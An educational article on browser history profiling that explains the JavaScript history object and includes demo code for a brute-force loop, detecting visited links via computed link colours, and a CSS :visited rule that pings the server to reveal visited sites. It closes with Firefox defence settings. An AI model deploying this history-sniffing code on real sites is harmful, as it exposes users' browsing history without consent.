History Profiling

JavaScript & CSS
Browser History Revealed

JavaScript History Object

Most web browsers maintain a history object: a list of URLs ( website addresses ) that is updated each time the browser requests a new page. This list is the web browsing history.

The URLs in the history object are not directly accessible via JavaScript. Restricting direct access to the list of visited URLs was a deliberate design decision by most browser manufacturers, because there would be privacy concerns if every website were able to read the full browsing history of its users.

window.history properties & methods
Name      Description                                    Type
length    Number of history entries.                     variable
current   Current page ( not readable ).                 variable
previous  Previous page ( not readable ).                variable
next      Next page ( not readable ).                    variable
forward   Forward one page in history.                   method
back      Back one page in history.                      method
item      Returns value in list ( not readable ).        method
go        Go to a domain or numerical position in list.  method

The entries marked not readable are an attempt to keep the visited URLs private from JavaScript; they can only be used by signed scripts with the user's permission. So the default model really only allows for length, back, forward and go.

Length does leak some information. For example, you could possibly tell whether someone had set their homepage to your website, or that it was early on in a browsing session ( later would be harder to detect, as history is not always flushed ). But this is not great grounds for privacy invasion.

Length is also limited, in a number of browsers, to the object that history is associated with. For example, opening a new tab or window should result in a new history object for that window.
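
As a rough sketch of how little length gives away, the function below turns a history length into a coarse guess about the session. The function name, the threshold of 2 and the labels are assumptions made for illustration; browsers differ on whether a blank start page counts as an entry, so the result is a hint at best.

```javascript
// Hypothetical helper: turn history.length into a coarse guess.
// Only the length property is read; no URLs are visible.
function describeHistoryLength(historyObj) {

    var len = historyObj.length;

    // assumption: one or two entries means this page was among
    // the first loaded in this tab or window
    if ( len <= 2 )
        return "early in session (" + len + ")";

    return "later in session (" + len + ")";
}

// in a browser: describeHistoryLength(window.history)
// a stand-in object is enough for a dry run
var sample = describeHistoryLength({ length: 1 });
```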

The go method accepts either a number or a string, and redirects the browser to the matching page in history. A number may be positive or negative and moves relative to the current position. A string is usually a domain: go searches backwards through the history until it finds a match. Technically it just matches a string.
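
The two forms of go can be pictured with a small model. This is not how any browser implements it: modelGo, the entries array and the index argument are all made up here, and the substring test is only one reading of "it just matches a string".

```javascript
// Model only: entries is an array of URL strings ( oldest first ),
// index is the current position, target is a number or a string.
// Returns the new index, or the old index if nothing matches.
function modelGo(entries, index, target) {

    if ( typeof target == "number" ) {

        var next = index + target;

        // out of range requests are ignored
        if ( next < 0 || next >= entries.length )
            return index;

        return next;
    }

    // string form: search backwards for an entry containing it
    for ( var k = index - 1; k >= 0; --k ) {

        if ( entries[k].indexOf(target) != -1 )
            return k;
    }

    return index;
}

var entries = [
    "http://www.google.co.uk/",
    "http://www.yahoo.com/",
    "http://www.cybersecurity.org.uk/"
];

var afterNumber = modelGo(entries, 2, -1);             // 1
var afterString = modelGo(entries, 2, "google.co.uk"); // 0
```

In the model the caller sees the resulting index; in the browser the calling script never sees the URL it lands on.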

Back and forward just act as if the browser forward or back buttons have been pressed.

The history object is quite useful for the web developer who wishes to offer the user some added functionality. history.back() is perhaps the most commonly used method, allowing the user to quickly return to the page they came from.


window.history.back()

history.back() is the most commonly used part of the history object. When called, it takes the user back to the page they came from.

The actual URL the browser ends up on is not readable by the JavaScript that calls history.back(), so there is no information leakage here. It is really just a handy feature to offer users: they can go back a page, and their progress through your site, or onto your site, is not revealed.

Combined with history.forward(), you can embed the browser forward and back buttons anywhere you like on a page for the user's convenience.

JavaScript history.back() example.
crtBack('backbteg');

function crtBack(parentID) {
    // create a back button

    var parentEle = getEle(parentID);

    var txt = crtTxt('< < < BACK');

    var bt = crtEle('span');

    bt.onclick = function (evt) {
        window.history.back();
    };

    bt.className = 'button';

    bt.appendChild(txt);

    clrEle(parentEle);

    parentEle.appendChild(bt);
}
//----------------------------------------------------------

window.history.go()

window.history.go() has a bit more meat to it than history.back(). history.go(-1) is equivalent to history.back(), but you could also specify history.go(-3), or history.go('google.co.uk'). The latter capability, specifying a string, is where the history object starts to leak information.

Whilst history.go() has more features than the back or forward methods, most of the extra features are not that usable for web developers in creating extra benefits for the user. So, on balance, the go method itself does not seem that useful.

history.go(string) also no longer works in a number of browsers. That was perhaps the more interesting of go's features, but it did offer the potential for a brute force attack, which we will get to later on.

JavaScript history.go(integer) example.
crtGo('gobteg');

function crtGo(parentID) {
    // create go example

    var parentEle = getEle(parentID);

    clrEle(parentEle);

    // assume last page in history chain

    var history_length = window.history.length;

    var max   = history_length;
    var lower = 0;

    if ( history_length > 10 ) {

        max   = history_length - 10;
        lower = Math.floor(Math.random() * max);
    }

    for ( var k = lower + 1; k < max; ++k ) {

        var txt = crtTxt("-" + k);

        var bt = crtEle('span');

        bt.className = 'button';

        bt.title = "Go back " + k;

        bt.goby = k * -1;

        bt.onclick = function(evt) {
            window.history.go(this.goby);
        };

        bt.appendChild(txt);

        parentEle.appendChild(bt);
    }
}
//----------------------------------------------------------

Brute Forcing

Brute force in computing is used to describe situations where the computational power and speed of a computer is used to try out various combinations, in an attempt to unlock, decrypt or decode something.

Computers can loop very quickly through a set of instructions, changing the values of their attempt each time, and can be left running, sometimes for months, in an attempt to crack a code. Sometimes the combination space is too large to try every combination. For those instances, dictionary attacks or rainbow tables of weak keys can be used instead. This reduces the number of combinations, but unless the person securing the system has been cautious, it often still results in a key being compromised.

Imagine a tumbler lock of 4 digits. The range of numbers would be from 0000 to 9999, or ten thousand combinations. A human would have to try for a fair bit of time until they found the combination ( on average 5,000 attempts ), but if a computer could work the tumbler, the speed would be a lot greater.

BruteForce example.
crtBrute('brutebteg');

function crtBrute(parentID) {
    // create brute force example

    var parentEle = getEle(parentID);

    clrEle(parentEle);

    if ( 'timeo' in parentEle )
       clearTimeout(parentEle.timeo);

    var randNum = Math.floor(Math.random() * 10000);
    var randStr = padZeroes(randNum, 4);

    for ( var k = 0; k < 4; ++k ) {

        var disp = crtEle('span');
        disp.className = 'display';

        var rdigit = randStr.substr(k, 1);

        disp.appendChild(crtTxt(rdigit));

        parentEle.appendChild(disp);
    }

    var sep = crtEle('span');

    sep.className = 'sep';

    sep.appendChild( crtTxt(".::.") );

    parentEle.appendChild( sep );

    var guessStr = padZeroes(0, 4);

    for ( var k = 0; k < 4; ++k ) {

        var guess = crtEle('span');

        guess.id        = 'guess' + k;
        guess.className = 'guess';

        var gdigit = guessStr.substr(k, 1);

        guess.appendChild(crtTxt(gdigit));

        parentEle.appendChild(guess);
    }

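    // guessRun increments before testing, so start one below
    // zero to make 0000 the first guess that is checked
    parentEle.guess   = -1;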
    parentEle.randNum = randNum;
    parentEle.k       = 0;
    parentEle.timeo   = setTimeout(guessRun, 1);
}
//----------------------------------------------------------

function guessRun() {
    // guess run

    var parentEle = getEle('brutebteg');

    var target = parentEle.randNum;

    var brute = parentEle.guess;

    ++brute;

    if ( brute < 10000 ) {

        var bruteStr = padZeroes(brute, 4);

        for ( var k = 0; k < 4; ++k ) {

            var guess = getEle('guess' + k );

            var gdigit = bruteStr.substr(k, 1);

            guess.firstChild.nodeValue = gdigit;
        }

        if (brute != target) {

            parentEle.guess = brute;
            parentEle.timeo = setTimeout(guessRun, 1);
        }
    }
}
//----------------------------------------------------------

The above code has been slowed down so that the display can update. Without displaying each guess, it will typically find the target in under one second.
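
For comparison, here is a sketch of the same search with no display and no timers. The function name bruteForce and the returned object are invented for this illustration; the second loop simply averages the attempt count over every possible target, which is where the figure of roughly 5,000 attempts comes from.

```javascript
// Sketch: the 4 digit search with no display and no timers.
function bruteForce(target) {

    var attempts = 0;

    for ( var guess = 0; guess < 10000; ++guess ) {

        ++attempts;

        if ( guess == target )
            return { found: guess, attempts: attempts };
    }

    // target was outside 0000 to 9999
    return { found: -1, attempts: attempts };
}

var target = Math.floor(Math.random() * 10000);
var result = bruteForce(target);

// average attempts over every possible target
var total = 0;

for ( var t = 0; t < 10000; ++t )
    total += bruteForce(t).attempts;

var average = total / 10000;   // 5000.5
```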


Visited Links

Browsers, by default, like to show a distinction between a link to a page that the browser has seen before and a link to a page that is new to the browser. A link is either fresh ( no history entry ) or visited ( a history entry ).

Not all of the above may be green, but those links that are green show the sites that the browser has already visited.

Not all of the above may be red, but those links that are red show the sites that the browser has not yet visited.

Instead of saying the browser has or has not visited a site, it would be more accurate to say that the site is, or is not, in the browser's history listing. This distinction is an important one, and is ultimately how you defend against browser history profiling.

It is possible in both JavaScript and CSS to inform the web server ( or, to a degree, any server ) which links are fresh and which are visited.

The links above were hard coded, but this time the lists will be output according to whether each link is visited or fresh. The state of these links is not communicated back to the server, so you are not revealing which links you have visited. But the point to realise is that it could be.

Visited links example.
crtVisited('visitedout');

function crtVisited(parentID) {
    // create visited example

    var parentEle = getEle(parentID);

    if ( ! ('testLinks' in parentEle) )
        crtTestLinks(parentEle);

    var testLinks = parentEle.testLinks;

    // rows are appended to the element that was passed in
    var tbody = parentEle;

    for (var k = 0; k < testLinks.length; ++k) {

        var url  = testLinks[k].url;
        var desc = testLinks[k].desc;

        var aLink = crtEle('a');

        aLink.href = url;
        aLink.appendChild( crtTxt(desc) );

        var td1 = crtEle('td');
        td1.className = "lower";

        td1.appendChild( crtTxt(url) );

        var td2 = crtEle('td');

        td2.appendChild( aLink );

        var td3 = crtEle('td');
        td3.rowSpan   = 2;
        td3.className = "lower";

        // attach the row first: some browsers return empty
        // computed values for elements not yet in the document
        var tr1 = crtEle('tr');

        tr1.appendChild(td2);

        tbody.appendChild(tr1);

        var color;

        if (window.getComputedStyle)
            color = window.getComputedStyle(
                aLink, null).color;

        else if (aLink.currentStyle)
            color = aLink.currentStyle.color;

        else
            color = "rgb(153, 0, 0)";

        if ( color == "rgb(0, 153, 0)" )
            td3.appendChild(
                crtTxt("Visited") );

        else
            td3.appendChild(
                crtTxt("Fresh") );

        tr1.appendChild(td3);

        var tr2 = crtEle("tr");

        tr2.appendChild(td1);

        tbody.appendChild(tr2);
    }
}
//----------------------------------------------------------

function crtTestLinks(ele) {
    // create test links

    var testLinks = new Array();

    var urls =
        "http://www.cybersecurity.org.uk/articles/histroy_profiling.htm," +
        "http://www.cybersecurity.org.uk," +
        "http://www.google.com," +
        "http://www.google.co.uk," +
        "http://www.yahoo.com," +
        "http://www.poisedsolutions.com," +
        "http://www.poisedcontacts.com," +
        "http://www.beautifulbalms.com," +
        "http://www.net-a-porter.com," +
        "http://www.poisedsolutions.com/binarymagick/";

    var descs =
        "History Profiling @ CyberSecurity (this page)," +
        "Cyber Security Home Page," +
        "google.com," +
        "google.co.uk," +
        "yahoo.com," +
        "Poised Solutions - IT Development UK," +
        "Poised Contacts - Fresh look at IT recruitment.," +
        "Beautiful Balms - handmade creams and aqua flower essences.," +
        "Net-a-porter - cutting edge designer clothing and accessories.," +
        "Binary Magick - binary tricks";

    var urlsA  = urls.split(",");
    var descsA = descs.split(",");

    for ( var k = 0; k < urlsA.length; ++k ) {

        var testLink = new Object();

        testLink.url  = urlsA[k];
        testLink.desc = descsA[k];

        testLinks.push(testLink);
    }

    ele.testLinks = testLinks;
}
//----------------------------------------------------------

The core of this profiling is the ability to access the computed style or current style of an element. It should also be remembered that the links had to be supplied, so the profiling could be brute forced by testing a huge number of domains.
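
A minimal sketch of that brute force idea follows. It assumes the caller supplies some way to read a link's colour; profileLinks, getColor, fakeColor and the short domain list are all hypothetical names used only for this illustration, and the colours are the ones tested in the example above.

```javascript
// Sketch: sort a candidate list into visited and fresh, given
// some way to read a link's colour. getColor is supplied by the
// caller; in a page it would wrap the computed style lookup.
function profileLinks(urls, getColor, visitedColor) {

    var visited = [];
    var fresh   = [];

    for ( var k = 0; k < urls.length; ++k ) {

        if ( getColor(urls[k]) == visitedColor )
            visited.push(urls[k]);
        else
            fresh.push(urls[k]);
    }

    return { visited: visited, fresh: fresh };
}

// hypothetical candidate list built from bare domain names
var domains = ["google.com", "yahoo.com", "poisedsolutions.com"];
var candidates = [];

for ( var k = 0; k < domains.length; ++k )
    candidates.push("http://www." + domains[k]);

// fake colour lookup for a dry run: pretend only yahoo was visited
function fakeColor(url) {
    return url.indexOf("yahoo") != -1
        ? "rgb(0, 153, 0)" : "rgb(153, 0, 0)";
}

var profile = profileLinks(candidates, fakeColor, "rgb(0, 153, 0)");
```

The candidate list is the only real cost: the longer the list of domains supplied, the more complete the profile.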


CSS Profiling Solo

There is a way to do this without the use of JavaScript, and that is to take advantage of the fact that CSS contains a few mechanisms to make a call to an external resource.

I won't actually implement this method here, primarily because I don't want to tie up a server resource processing the results, but I will demonstrate how this is done.

a:visited.poisedsolutions {
    background :
        url('/visited?poisedsolutions')
        no-repeat bottom left;
}

An anchor tag is then inserted somewhere in the document with the appropriate class name and href. When the tag is rendered, and only if the site has been visited, the browser will make a call to /visited with a query string denoting the site.
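
To probe more than one site, the rule and its anchor would be repeated per site. The sketch below generates both as text. The /visited path comes from the rule above; buildCssProbe, the site list and the link text are made up for illustration, and it assumes each name is already safe to use as a CSS class and in a query string.

```javascript
// Sketch: build one CSS rule and one anchor per site.
// No escaping is done, so names must already be plain
// identifiers ( an assumption of this example ).
function buildCssProbe(sites) {

    var css  = "";
    var html = "";

    for ( var k = 0; k < sites.length; ++k ) {

        var name = sites[k].name;
        var url  = sites[k].url;

        css += "a:visited." + name + " {\n" +
               "    background :\n" +
               "        url('/visited?" + name + "')\n" +
               "        no-repeat bottom left;\n" +
               "}\n";

        html += '<a class="' + name + '" href="' + url + '">' +
                name + '</a>\n';
    }

    return { css: css, html: html };
}

var probe = buildCssProbe([
    { name: "poisedsolutions", url: "http://www.poisedsolutions.com" },
    { name: "yahoo",           url: "http://www.yahoo.com" }
]);
```

probe.css would go into a style sheet and probe.html into the page body; the server then only has to log which /visited requests arrive.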


Defending Against History Profiling

Securing against history profiling in Mozilla Firefox is not that hard, but you will lose the different coloured links and, more importantly, the History pages, though forward and back will still work. Perhaps this will improve in the near future.

Main Menu -> Edit -> Preferences
Firefox Preferences Dialog
Privacy Tab
Uncheck - Remember visited pages...


Conclusion

Many companies are already profiling people who use the web, and there are a lot of people who are trying to limit or stop the profiling as well.

Some people will not care that any website they visit has a limited ability to work out which sites or pages they may have visited before, some may even see it as a service. There is quite a lot we can do with that knowledge in terms of offering things that are more tailored to consumer tastes.

Profiling is double edged though, and certain information can be used against you, so it is prudent to know when to allow history access and when not to. In most instances it should be enough just to ask whether the customer wishes to avail themselves of this service. And if you are using your browser for activities such as online banking, it is wise to use a separate browser instance, or to make sure banking is done in one session and the browser history cleared afterwards.



Site Designed & Developed by Poised Solutions
